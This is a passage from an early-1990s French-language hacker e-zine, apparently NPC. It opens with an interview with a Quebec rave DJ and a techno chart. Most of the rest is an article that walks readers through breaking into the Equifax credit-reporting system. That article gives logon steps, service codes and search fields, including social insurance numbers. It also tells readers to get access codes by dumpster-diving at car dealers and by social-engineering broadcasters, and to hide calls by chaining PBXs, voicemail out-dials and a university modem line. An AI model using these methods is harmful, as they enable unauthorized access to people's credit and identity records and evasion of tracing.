vie en m'amusant, qu'il fallait que j'assume mes responsabilit‚s dans la
vie en la gagnant le sourire aux lŠvres!

Blitz- C'est amusant que tu parles de "responsabilit‚s" dans le contexte.
Il y a des gens qui diraient justement que c'‚tait un geste irresponsable.

Daniel- Ma vie. Ma peau. J'en fais ce que je veux, et ce que je ne voulais
pas, justement, c'est la perdre … la gagner.

Blitz- Commence ta feuille de route, gar‡on.


Daniel- Mille et un m‚tiers, depuis, pour financer mes "rˆves". La radio
est arriv‚e dans ma vie en 83, et j'ai rapidement r‚alis‚ que spinner des
disques correspondait … ce que je voulais faire. Donc, CKRL en 1983, avec
une premiŠre ‚mission … saveur new-wave et punk, TRANSMISSIONS.

Blitz- C'est aussi … cette ‚poque que tu t'es mis … descendre … New-York
… tous les trois mois pour ramener des piles de galettes de Run-DMC et
Grandmaster Flash...

Daniel- J'ai effectivement d‚couvert le rap … cette ‚poque, et j'ai mˆme
‚t‚ le premier … en faire jouer sur les ondes de la radio … Qu‚bec. Pour
revenir … mon exp‚rience … CKRL, j'ai particip‚ … la premiŠre quinzaine
Internationale de la Radiophonie, et j'ai produit et r‚alis‚ plusieurs
‚missions qui ont ‚t‚ entendues sur les radios communautaires … travers
le monde.

Blitz- Je me souviens que tu avais fait venir THE SOPHIST, un cingl‚ de
la musique ‚lectronique que tu avais d‚couvert … New-York!

Daniel- Ouais, le pied! Et puis, avec les d‚m‚nagements des locaux de CKRL
de l'universit‚ vers la rue Ste-Ursule, j'ai eu de plus en plus
d'‚missions … ma charge. LES AUDIENCES DE LA CEBO (Commission d'Enquˆte
sur le Bruit Organis‚) fut une s‚rie que nous avions r‚alis‚ ensemble et
qui a connu un certain succŠs. Nous avions un contrat avec le New Music
Express de Londres pour diffuser une s‚rie d'une cinquantaine d'entrevues
avec des groupes comme Cocteau Twins, Diamanda Galas, Sisters of Mercy,
etc... Une deuxiŠme quinzaine internationale de la radiophonie qui a eu
un succŠs boeuf. Et plein de trucs encore... L'‚mission sp‚ciale sur la
venue du pape … Qu‚bec, tu te souviens?

Blitz- J'en ris encore! Et ta vie de DJ hors de CKRL?

Daniel- J'ai fait les beaux jours, ou plut“t les belles nuits, de l'Ombre
Jaune, … l'‚poque. Mes go–ts musicaux continuaient … ‚voluer, et j'ai
toujours r‚ussi … trouver LE son, nouveau et int‚ressant, qui allait
former la prochaine vague … la mode... Plusieurs autres clubs ont aussi
go–t‚ … ma m‚decine. Et puis, je me suis dit que ‡a pourrait ˆtre une
exp‚rience enrichissante de travailler … mon propre compte.

Blitz- Et ‡a a pris la forme de...?

Daniel- Je me suis mis … "manager" quelques groupes de Qu‚bec, et …
produire des spectacles et des albums. Les PRODUCTIONS DERNIER RECOURS,
c'‚tait moi! J'ai produit le premier album de Hunting Today, par exemple.
J'ai organis‚ des tas de shows … Qu‚bec, Front 242 deux fois, Chris Isaak
au Vieux Port, Ludwig van 88, Les Gar‡ons Bouchers, Killing Joke, Dread
Zeppelin, Les B‚ruriers Noirs, etc... Je me suis ruin‚, financiŠrement,
… produire de tels spectacles. J'ai perdu quelque chose comme 30 000$ en
deux ans. C'est pas rentable, ce genre de truc, si t'es pas un Donald K.
Donald. Pis je m'entˆtais … faire venir du stuff que j'aimais, mais qui
n'‚tais pas encore "au go–t du jour". Toujours la maudite longueur
d,avance... Chris Isaak, par exemple, qui est venu par deux fois donner
des fichus bons spectacles … Qu‚bec, mais c'‚tait encore AVANT que le film
de David Lynch fasse connaŒtre "Wicked game"...

Blitz- Tu as aussi poss‚d‚ ton propre club pendant un moment...

Daniel- Oui, j'‚tais co-propri‚taire du ARTEFAXX, sur la C“te de la
Fabrique. Ca avait une gueule d'enfer, mais on a vendu parce que je
n'avais pas la bosse de l'administration, et mon collŠgue non-plus
d'ailleurs. On a fait du fric avec la vente, ce qui m'a permis de me
lancer dans d'autres avenues. Le Artefaxx est maintenant un restaurant de
fruits de mer, le POISSON D'AVRIL, je crois...

Blitz- Tu as aussi fait de la performance vid‚o...

Daniel- Oui, mais, c'‚tait vraiment juste un …-c“t‚... Avant tout ‡a, il
y avait encore la musique, et toutes ces nouvelles sonorit‚s qui me
hantaient. J'ai import‚ le son "batcave" alors qu'il n'‚tait encore qu'une
rumeur … Londres, et puis... j'ai d‚couvert, au cours d'un de mes voyages
… Amsterdam, les acid houses. Ca m'a ‚clat‚, cette affaire-l…. Je me suis
mis … explorer, en mˆme temps que plusieurs petits tripatouilleurs de sons
aux quatre coins du monde, sur l'int‚gration de l'acid music … la techno,
je me suis mis … d‚velopper le son "rave".

Blitz- Et qu'en as-tu fait?

Daniel- je suis depuis quelques temps redevenu un "DJ for hire"... Je ne
travaille plus dans une boŒte en particulier, j'organise plut“t, sur
demande, des soir‚es rave chez les gens qui en veulent une.

Blitz- J'ai attrap‚ une de tes derniŠres prestations … L'Amour Sorcier.
Chapeau!

Daniel- Que ce soit … L'Amour, ou au Bizz, ou … la Fourmi Atomik, ou au
Bal du L‚zard, nomme-les, je les connais tous... Je pr‚fŠre les partys
"priv‚s" organis‚s par des individus, pour une gang de chums. J'ai parfois
des contrats … Montr‚al. Rien de mieux qu'une grande salle moche avec un
minimum d'‚quipement, je trouve. La soir‚e est une r‚ussite par la seule
force de ta musique et de ton animation dans ce temps-l….

Blitz- ACiiiiiiiiiiiiiiiiiiiiD!

Daniel- Yeah!

Blitz- Et si on parlait de la musique elle-mˆme pour terminer? Parle-moi
de la cyber-musik, de la techno, du rave, de l'acid, et des distinctions
qu'il faut y faire...

Daniel- Toutes les musiques que tu viens de me nommer ont ceci de
particulier, par rapport au sonorit‚s plus traditionnelles du rock: avec
ces nouveaux sons, tu as 25 ans, au bas mot, de dext‚rit‚ musicale qui
viennent de prendre le bord de la poubelle. Nous sommes pass‚s de
l'aptitude physique … produire des sons en maŒtrisant un instrument …
l'aptitude MENTALE … concevoir des sons … partir de sources sonores d‚j…
existantes et que l'on hacke, comme tu dirais, que l'on perverti...

Blitz- Je lisais justement une d‚finition dans un bouquin l'autre jour
[NdE: Storming the reality studio: A casebook of cyberpunk and PostModern
Science fiction, par Larry McCaffery], une d‚finition int‚ressante de la
cybermusik: feeding the noise back into the system. R‚alimenter le bruit
dans le systŠme qui l'a g‚n‚r‚. Comme Ensturzende Nbaten, par exemple,
qui reprend les sons "industriels", les scies, les marteaux-piqueurs, les
sons d'une soci‚t‚ industrielle, pour les retourner dans les oreilles de
cette soci‚t‚, complŠtement harmonis‚s, au niveau du concept.

Daniel- C'est pas n‚cessairement une approche ludique trŠs novatrice, car
un groupe comme Kraftwerk, par exemple, d‚montrait depuis des ann‚es que
l'aptitude … programmer des sons et des s‚quences pouvait prendre le pas
sur l'expertise manuelle d'un instrument. Sauf que, maintenant, le
synth‚tiseur-‚chantillonneur est un instrument … part entiŠre de tout
groupe qui se respecte, et la construction, l'‚chafaudage d'un phras‚
musical englob‚ dans son entiŠret‚ par ces instruments est le propre d'une
multitude de hacker-musiciens. Front 242, Test Departement, Future Sound
Of London, Ministry, etc... Je ne dis pas que tous ces groupes forment la
totalit‚ de ce qui devrait ˆtre couvert par ce terme de "cybermusik", mais
c'est une des avenues les plus dansantes, … tout le moins.

Blitz- Je suis all‚ … ta derniŠre soir‚e rave, et j'ai remarqu‚ que le
beat d'enfer qui meut toutes ces jambes et ces corps sur la piste de danse
n'est pas sans me rappeler, malheureusement, la disco des ann‚es 70.

Daniel- Et pourtant, pour l'oreille avertie, les pulsations par minute ont
augment‚ au fil des ann‚es. Par exemple, le disco ‚pousait un rythme de
120 beat/minute. La musique rave la plus violente pousse maintenant des
pointes jusqu'… 200 b/m... La moyenne des productions techo et acid se
situe autour de 160 … 180 b/m.

Blitz- Et pour les amateurs du genre, quels sont les groupes que nous
devrions surveiller?

Daniel- Je vais faire mieux que ‡a, Blitz. A compter de ce mois-ci, je
vais vous offrir de publier dans NPC un top five des meilleurs groupes de
rave/techno/house.

Blitz- Ca va te prendre un handle si tu veux ‚crire pour nous!

Daniel- Pas de problŠme... GENGIS DAN, ‡a te va?

Blitz- Ouais, super! Dankechein, Daniel!

Daniel- Merci … NPC!

----------------------
TOP 5 AMBIENT/TECHNO

Groupe/celllule Titre chanson Titre album # ‚tiquette


1-United Frequen- Gemini 6 U.F.O.T MFS-7027-2
cies Of Trance Vol. 2

2-Electric Music Intercomix Crosstalk SPV-056-
110363

3-Polygon Window If it really Surfing on WARP CD-7
isn't me sine waves

4-The Future Papua New Accelerator Jumpin and Sound
of Guinea Pumpin CD-
London TOT-2

5-Forgotten Echoes 3000 OHM! Suck CD3
Worlds (compilation)


--------------


Co0l Dude. Si vous d‚sirez organiser des soir‚es rave pour votre ‚cole,
votre bureau, l'enterrement de votre poddle, n'h‚sitez pas … contacter
Daniel au 418-694-1104. Dites-lui que c'est NPC qui vous envoie, et il
vous fera un prix d'ami! Daniel a profit‚ de l'occasion pour cr‚er un
super-mix NPC qui va jouer dans ses prochaines soir‚es. Un de vos copains
a peut-ˆtre d‚j… la cassette entre les mains. Nous allons en sampler un
extrait pour faire un .VOC que vous pourrez trouver, tout … fait
gratuitement, sur les boards NPC de Qu‚bec. On pourrait pas vous mettre
tout le mix au complet, malheureusement, sinon ‡a ferait 20 megs...

En passant, il y a aussi un .GIF NPC sur ces boards, une oeuvre originale,
inspir‚e du mouvement constructiviste russe de l'entre-deux guerres. Cette
peinture a ‚t‚ r‚alis‚e par un artiste originaire de la r‚gion 418, Louis
R‚millard. M. R‚millard a un portfolio trŠs int‚ressant: ses lithographies
et estampes sont expos‚es aussi bien au Japon qu'… Berlin, et, plus proche
de nous, le Mus‚e du Qu‚bec s'est port‚ acqu‚reur de quelques unes de ses
oeuvres pour sa collection permanente. Lorsqu'il n'ex‚cute pas des
commandes sp‚ciales pour NPC, le travail de M. R‚millard r‚flŠte une
pr‚occupation ind‚niable pour la ville et ses travers. Nous vous tiendrons
inform‚s des lieux et dates de la prochaine exposition solo du sieur
R‚millard sur son sol natal, ‡a va vous brancher, j'en suis certain...


Le GIF, le VOC, il ne nous reste plus qu'… organiser le NPC World Tour:
une tourn‚e de tous les p‚nitenciers f‚d‚raux de la province, peut-ˆtre?


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

NOUS DEVELOPPONS POUR VOUS LES TELEPHONES DU FUTURS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



"CLASSEZ LE DANS LE REGISTRE DES DCDS!"
"OUAIS CHEF!"

QUIFAX

Par

AtrEiD BeVaTRoN



Beaucoup de gens croient … la vie priv‚e. Beaucoup de gens croient
que le concept de vie priv‚e est sacr‚. Beaucoup de gens croient qu'ils
ont droit … une deuxiŠme chance. Beaucoup de gens croient que le fait
qu'ils aient pay‚ cinq fois leur compte de Bell en retard ne changera
rien … leur vie et … leur marge de cr‚dit. Beaucoup de gens croient
qu'ils sont libres.

Ils se trompent, vous vous trompez, ON EST TOUS DANS L'ERREUR PUTAIN
DE MERDE!!! Pourquoi? Parce que moi, comme vous et comme TOUS les autres,
nous sommes fich‚s, enchaŒn‚s dans l'engrenage que constitue le systŠme.
Je porte un num‚ro de s‚rie, comme vous tous, et n'importe quel imb‚cile
de presque n'importe o— peut s'informer de ma sant‚, mes prestations
d'assurance-ch“mage, ma marge de cr‚dit. C'EST IMPOSSIBLE VOYONS!!! C'EST
CONTRE LA VIE PRIVE!!!

Vous ˆtes bien na‹f... En effet, je n'ai moi-mˆme, croyez-le o— non,
qu'… composer un simple bordel de num‚ro de t‚l‚phone, par modem, et me
voil… entr‚! Simple vous entends-je dire? TROP simple! Si simple que des
tas de personnes ne voient rien d'immoral dans le fait d'aller consulter
votre dossier, quand bon leur semble. Des fonctionnaires v‚reux vendent
vos informations … certains autres fonctionnaires encore plus v‚reux, qui
eux, comme par hasard, oublieront votre dossier sur le coin de leur
bureau, dossier qui se fera ramasser par une quelconque personne qui,
encore par hasard, d‚sirait justement, par hasard, effectuer une enquˆte
sur vous pour savoir si vous avez d‚j… fraud‚ l'assurance-ch“mage.

Moi, j'appelle ‡a une NORME coincidence!!! Et savez-vous ce qui est
le plus injuste l…-dedans? Le plus injuste, c'est que si vous appelez
vous-mˆme QUIFAX CANADA pour leur demander les infos sur VOTRE PROPRE
DOSSIER, ils vous r‚pondront que ces informations sont CONFIDENTIELLES!!
Attendez un peu, je suis curieux :

CONFIDENTIEL : Se dit de ce qui est d‚clar‚ en secret … quelqu'un.

Autrement dit, Equifax devrait, en principe, poss‚der des
informations secrŠtes? Hey merde! Voici un exemple de ce qu'il y a de
secret dans votre dossier:

J'ai souvent entendu parler (et j'en connais d'ailleurs certains qui
sont impliqu‚s), de personnes plac‚es devant un certain problŠme, soit
qu'ils sont dans l'impossibilit‚ TOTALE de se trouver un logement.
Simple, ils sont malpropres et non-civilis‚s! NON! Ils sont humains et
sont comme vous et moi! Alors, comment expliquez-vous ‡a? Simple!

J'explique ‡a par le seul fait que, pendant une p‚riode d'environ
trois mois chacune, ces personnes ne sont pas arriv‚es … boucler leur
budget comme il le fallait. Ce qui veut dire qu'ils ont eu beaucoup de
retard en r‚glant leur facture de logement. R‚sultat: Les informations de
ces mˆmes personnes ont ‚t‚ communiqu‚es, par les proprios eux-mˆmes, …
la R‚gie du logement. La R‚gie du logement s'est alors EMPRESSE
d'inscrire une note disant que ces personnes ‚prouvaient certains
problŠmes financiers, et qu'ils constituaient donc une clientŠle … risque
pour les propri‚taires. Alors pour enchaŒner, lorsqu'une de ces personnes
se cherche un logement, le propri‚taire appelle … la R‚gie, demande
certaines informations sur ces personnes, et se fait r‚pondre qu'il y a
des risques... Que croyez-vous qu'il fait? Il s'empresse lui-aussi de
jeter le nom et le num‚ro de t‚l‚phone de la personne en question dans
les poubelles, et lui dit qu'il la rappellera... Vous imaginez la
suite...

Tout ce que je veux dire, c'est que la vie priv‚e, OUBLIEZ €A!!!

Tout ce que je veux dire, c'est que votre deuxiŠme chance, OUBLIEZ-
LA!!!
Tout ce que je veux dire, c'est que la LIBERT, c'est une belle
connerie!!

Vous ˆtes inscrits quelque part et votre dossier n'attend que de se
faire cueillir dans l'arbre florissant des informations CONFIDENTIELLES!
Quoi faire dites-vous? Pas grand chose, mais...

Ne restez pas esclaves comme ils le veulent! Ne restez pas passifs
comme ils le d‚sirent! AGISSEZ! Comment?, dites-vous de nouveau.

C'est ce que je me suis pos‚ comme question, et j'ai pris les moyens
pour arriver … p‚n‚trer leur systŠme … la con... Et j'y suis arriv‚! Ce
texte vous expliquera EN DTAIL comment vous pouvez, vous-mˆme, vous
procurer un code valide sur le systŠme et comment vous en servir...

Certains diront que cela est ILLGAL!! Que pensez-vous alors de la
fa‡on dont agit cette merde de gouvernement? Vous ˆtes d'accord sur le
fait que presque n'importe quel imb‚cile de fonctionnaire peut avoir
accŠs … vos dossiers? Vous trouvez normal que presque n'importe qui, en
fait, puissent admirer votre dossier m‚dical? Alors vous n'ˆtes qu'un
esclave! Un de ces loosers que les gens aiment … appeler : les passifs,
les bons citoyens... Ce texte n'est pas pour vous.

Passons maintenant … la pratique, sinon on va dire que je suis
subversif, s‚ditieux et autres choses du genre... ;-)


PremiŠrement, pour entrer dans le r‚seau quifax, vous aurez besoin
du programme n‚cessaire, communement nomm‚ un TERM. Le TERM en question
est mieux connu sous le nom de C.I.S. (Credit Information System) de son
abr‚viation. Certains qui ont d‚j… p‚n‚tr‚ le systŠme viendront peut-ˆtre
me dire que c'est possible sans le TERM, mais encore l…, je ne le crois
pas... Le term envoie des s‚ries de lettres et de chiffres, chaque
commande correspondant … une s‚rie de lettres. Le term est d'ailleurs ce
que j'ai toujours utilis‚, n'oublions pas qu'il se DOIT d'ˆtre simple,
car en fait, les utilisateurs les plus fr‚quents sont probablement des
personnes qui savent … peine comment manipuler un ordinateur.

O— se procurer le C.I.S.?

Malheureusement, j'ai le regret de vous dire que joindre ce programme
dans l'archive de NPC serait ill‚gal! <Ooooohhhh!> Pourquoi? Non pas pour
la raison de ce … quoi le programme servirait, mais simplement parce que
le programme de Term est Copyright. O— se le procurer alors? Simple! Dans
tout bon bbs pirate, H/P ou autre, que ce soit … Qu‚bec ou ailleurs comme
… Montr‚al ou Hull. Je n'ai toutefois jamais essay‚ d'entrer sur un
systŠme de cr‚dit am‚ricain, je veux dire par une node am‚ricaine, je ne
peux donc pas vous dire si le programme fonctionne pour CBI, mais je peux
le pr‚sumer, ‚tant donn‚ que CBI n'est en fait que la version am‚ricaine
de quifax. En effet, les deux systŠmes sont de mˆme souche.

Je vous entends d‚j… dire que vous ne serez pas capable de trouver
le num‚ro. Vous avez peut-ˆtre raison! ;-) TOUTEFOIS, nous NPCiens, nous
assurerons d'une chose lors de la distribution du logiciel C.I.S.. Nous
nous assurerons qu'un petit fichier du nom de NUMBERS.!!! soit int‚gr‚
dans l'archive. Ce fichier contiendra le, ou les num‚ros connus avec
lesquels vous pouvez communiquer avec le systŠme quifax par modem. Nous
avons beaucoup h‚sit‚ entre le choix d'inclure le num‚ro d'accŠs de
Qu‚bec, dans le journal, mais ‚tant donn‚ qu'… notre connaissance, C.I.S.
n'a jamais ‚t‚ distribu‚, nous nous assurerons qu'il le soit
convenablement, avec ce num‚ro. En d'autres mots, le num‚ro et le
logiciel sont deux choses indissociables.



LA CONFIGURATION DE C.I.S.:

Vous lisez NPC en ce moment et vous avez probablement appel‚
quelques part, par modem, pour l'avoir. Vous connaissez donc les bases de
la configuration d'un programme de communication. Ce programme ne fait
pas exception … la rŠgle. Il est trŠs simple … configurer. La doc de
Telemate devrait carr‚ment faire l'affaire... Toutefois, si le besoin ou
la demande se fait ressentir, je me ferai plaisir d'inclure la doc
INTGRALE dans le NPC#5, chose que je ne fais pas maintenant pour la
seule raison nous voulons savoir si le sujet int‚resse les gens, mˆme si
nous nous en doutons, avant de nous lancer dans les explications
compliqu‚es et d‚taill‚es. Ce texte peut donc ˆtre vu comme une
introduction, un Quick-Start au r‚seau QUIFAX...


LE LOGON:

Lui aussi est assez simple. Vous n'aurez besoin que de votre USER
ID, et de votre password correspondant. Je vous d‚crirai plus loin
comment vous en procurer. Voici quoi faire une fois que vous serez
connect‚:

1- Appuyez seulement sur . et appuyez sur ENTER.

2- Vous verrez apparaŒtre … l'‚cran:
DATABASE INFORMATION SERVICE
YOUR USER ID PLEASE:

3- Vous tapez ensuite votre num‚ro d'usager et vous appuyez sur ENTER.


4- Vous verrez apparaŒtre … l'‚cran:
PASSWORD

5- Vous entrez votre password et appuyez sur ENTER.

6- Vous verrez apparaŒtre … l'‚cran:
PROCEED


Une fois entr‚, vous devrez indiquer au systŠme votre destination,
c'est-…-dire quel service vous d‚sirez utiliser. Voi‡i ce que vous aurez
… l'‚cran:

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ ³
³ ** C.I.S. ** ³
³ ³
³ SIGN ON MENU ³
³ -------------- ³
³ ³
³ ³
³ FACILITY................._________ ³
³ ³
³ PASSWORD................._________ ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


Le terme FACILITY repr‚sente le service dans lequel vous d‚sirez
entrer et le PASSWORD est le mot de passe que vous pourrez vous procurer
avec un peu de Social Engineering avec une station de t‚l‚vision. Le
Social Engineering semble ˆtre un don acquis pour nous tous, NPCiens,
phreakers, hackers, mais il en est peut-ˆtre d'un tout autre cas pour
vous qui lisez cette article, qui ˆtes peut-ˆtre des non-initi‚s. Dans ce
cas, je vous convie … lire NPC#5 dans lequel j'‚crirai un article sur les
principes de base du Social Engineering.

Voici la liste des services dans lesquels vous pouvez vous diriger:

CONSUMER REPORTING..................: CONS
COMMERCIAL REPORTING................: COMM
ADDITIONAL COMMUNICATION FACILITIES.: ACF
COLLECTIONS.........................: COLL


Je vais d'ailleurs r‚server ce texte … la partie CONSUMER REPORTING,
et ferai un compl‚ment, une suite … ce texte qui aura en fait deux
parties. La partie CONSUMER REPORTING concerne les gens comme vous et
moi, les gens qui subissent cette merde d'injustice.


BON! Vous avez entr‚ le FACILITY et le bon PASSWORD correspondant,
voil… ce que vous verrez apparaŒtre … l'‚cran:

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ ** C.I.S. ** ³
³ C R E D I T B U R E A U M E N U ³
³ ------------------------------------- ³
³ ³
³ 1. Credit bureau reporting online access ³
³ 2. Credit bureau reporting batch access ³
³ 3. Save inquiries on disk ³
³ 4. ³
³ 5. Clear all inquiries ³
³ 6. Quit ³
³ ³
³ Select Option Number Return ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ



Option 1 - Credit bureau reporting online access :

Voici ce que vous lirez et devrez remplir. Certains espaces ne sont
pas n‚c‚ssaires pour donner les coordonn‚es de recherche, d'autres sont
OBLIGATOIRES, comme le Billing Code et la Date du jour...
Les "blancs" que vous devez remplir dans cette page sont les keywords qui
fera chercher leur ordinateur, pour trouver la personne que vous
recherchez.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ *** SUBJECT DATA ENTRY *** ³
³ ³
³ Network:__ File:__ Billing:__ Client:________ ³
³ Date: __/__/__ ³
³ **SUBJECT** ³
³ Last Name...:________________ ³
³ First Name..:________________ Suffix:__ ³
³ Middle Name.:________________ Sp.First Name:__________ ³
³ Sp.Last Name:________________ ³
³ ³
³ **CURRENT ADDRESS** **FORMER ADDRESS** ³
³ Street No:__________ Street No:____________ ³
³ Street Name:____________ Street Name:__________ ³
³ Street type:____________ Street type:__________ ³
³ City:________ Appartment:___ City:_________ Appartment:___ ³
³ Province:__ Postal Code:______ Province:__ Postal Code:_______ ³
³ ³
³ **EMPLOYMENT** ³
³ Occ:__________________________ Emp:___________________________ ³
³ ³
³ **IDENTIFICATION** ³
³ Subject.. DB: __/__/__ AGE:___ SSS:___-___-___ ³
³ Spouse.. DB: __/__/__ SSC:___-___-___ ³
³ ³
³ F1 Send F2 Add FK F3 Review F6 Delete Inq F9 Redial ESC ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


Voici les significations des paramŠtres les moins ‚vidents:

NETWORK: Il peut ˆtre compos‚ d'une des deux lettres existantes.
A - ACRO (quifax Network)
C - CBI (CBI Network - USA)

FILE : Indique le type de fichier … demander.
I - Individual File : Uniquement le fichier de la personne
en question sera demand‚.
J - Joint File : Les fichiers de la personne demand‚e
ET de son ‚pouse ou ‚poux.
M - Military File : Disponible seulement du r‚seau CBI.
Non valable pour quifax.
S - Segmented File : Indique que vous ne d‚sirez que la
partie du dossier relevant de
l'identit‚ de la personne. (Nom,
addresse, date de naissance, num‚ro
d'assurance sociale, profession)

BILLING CODE : Un PETIT code d'accŠs qui vient normalement avec le
programme. Il doit ˆtre inscrit pour continuer … entrer
les coordonn‚es de recherche. Il existe environ 50 codes
d'accŠs … travers le r‚seau quifax.

CLIENT : Cette partie apparaŒt automatiquement aprŠs l'inscription du
Billing Code...

DATE : Vous DEVEZ inscrire la date. Simple, c'est la date du jour o—
vous ˆtes!!

SUFFIX : Sr, Jr, 1, 2, 3, Dr, Rv.

SP.xxxx NAME : Sp veut dire SPOUSE, soit ‚poux ou ‚pouse.

SSS : Num‚ro d'assurance sociale de la personne en question.
SSC : Num‚ro d'assurance sociale de l'‚pouse ou ‚poux de la personne.



Voici la liste des paramŠtres OPTIONNELS et ceux OBLIGATOIRES …
entrer dans le r‚pertoire de recherche:

OPTIONEL = P
OBLIGATOIRE = B

NETWORK = B
LAST NAME = B
FIRST NAME = B
SUFFIX = P
MIDDLE NAME = P
SP.FIRST NAME = B
SP.LAST NAME = P
STREET NUMBER = P
STREET NAME = P
STREET TYPE = P
APARTMENT # = P
CITY = B
PROVINCE,STATE = B
POSTAL CODE = P
EMPLOYMENT = P
AGE = P
SSS = P
SSC = P
BIRTH (DB) = P


Une fois que tous les paramŠtres de recherche requis sont entr‚s,
simplement appuyez sur F1 (send) et les INFOS seront automatiquement
affich‚es … l'‚cran.

Je ne m'attarderai que sur l'option 1, car les autres options comme
Credit Bureau Reporting Batch Access concernent surtout les v‚ritables
utilisateurs. En effet, pour l'utilisation que nous et vous d‚sirons en
faire, l'option 1 sera amplement suffisante!


Et voil… pour la partie de l'entr‚e. Voici quelques notes diverses
maintenant, comme O— TROUVER DES FOUTUS CODES D'ACCŠS?!?


Les codes d'accŠs:

J'espŠre que vous n'avez pas peur de vous salir, car vous devrez
vraiment ne pas h‚siter. Vous devrez aller trasher! Et pas dans les
poubelles du Bell cette fois, mais bien dans les poubelles d'UN
CONCESSIONNAIRE AUTOMOBILE! Ceci peut sembler assez ridicule … premiŠre
vue, mais o— pouvez-vous d‚penser le plus d'argent en un laps de temps
incroyablement court? Chez un concessionnaire automobile. C'est pourquoi
les vendeurs possŠdent en g‚n‚ral tous un code, si bien que quifax est
utilis‚ trŠs r‚guliŠrement par eux, puisqu'ils doivent savoir si les
acheteurs sont des placements s–rs.
D'autres fa‡ons? Bien s–r! Il y a le Social Engineering par exemple.
Ce qui veut dire que vous devez utiliser votre belle voix! Voici quelques
endroits o— utiliser votre imagination: Les stations de t‚l‚vision et de
radio, les concessionnaires automobiles, les banques, certains
bijoutiers. Enfin vous voyez le genre? Tout ce qui co–te beaucoup
d'argent!


Le danger d'utilisation frauduleuse:

Je n'aime pas beaucoup le terme FRAUDULEUX... Je trouve que ce
systŠme en entier devrait ˆtre d‚clar‚ FRAUDULEUX … mon avis, mais
puisqu'il faut appeler les choses par leur nom, employons les bons
termes!
Vous avez lu le texte sur les PBXs dans NPC #1? LISEZ-LE! Enfin si
vous n'y connaissez rien, parce que quifax, CBI, TRW et tous les autres
r‚seaux de renseignements de cr‚dits sont trŠs dangereux. Ce qui veut
dire? Ce qui veut simplement dire que si on vous surprend, vous pouvez
presque dire adieu … votre dossier judiciaire! Il ne faut ‚videmment pas
exag‚rer, mais soyez prudent! COMMENT?
1- 418-656-7700 vous connaissez? C'est d‚j… mieux que d'appeler de chez
vous. Il sagit du num‚ro de t‚l‚phone du r‚seau de l'Universit‚ Laval.
Avec ‡a, vous vous connectez, faites -=-=-=-=-= jusqu'au BIP, et … partir
de l…, faites E pour Externe. Ils vous demanderont le num‚ro de votre
point d'arriv‚e, tapez simplement le num‚ro de quifax.
2- Mˆme avant d'appeler … l'universit‚, prenez la peine de passer par
un ou mˆme 2 PBX, diverters ou Out-Dials de VMB.
Personnellement, lorsque je veux entrer dans le r‚seau, je prends
BEAUCOUP de pr‚cautions: J'appelle un OUT-DIAL DE VMB. De l…, j'appelle
un PBX am‚ricain 800. De l…, je contacte un Decserver 800 am‚ricain. De
l…, j'appelle un UNIX de qu‚bec avec lequel je peux out-dialer et de l…,
j'appelle l'Universit‚ Laval. Je rappelle l'Universit‚ Laval 2-3 fois …
partir de l'Universit‚ Laval (je fais une loop) et de l…, j'appelle enfin
quifax! Simple hein? ;-) Toutefois, je r‚serve cela pour mes sessions de
trŠs longues dur‚e. Si vous ne d‚sirez faire qu'une seule requˆte, ne
faites que passer d'un PBX 800 … l'Universit‚ Laval et de l…, vous pouvez
appeler quifax sans problŠme....

Voil… pour cet article, ‚crit un peu rapidement je l'avoue,
puisqu'il ne s'agissait que d'une introduction! (Une intro de 8 pages!
Pouha!)

Je n'ai parl‚ que de la partie CONSUMER. Je parlerai dans le
prochain num‚ro de la partie COMMERCIALE, enfin si la demande est
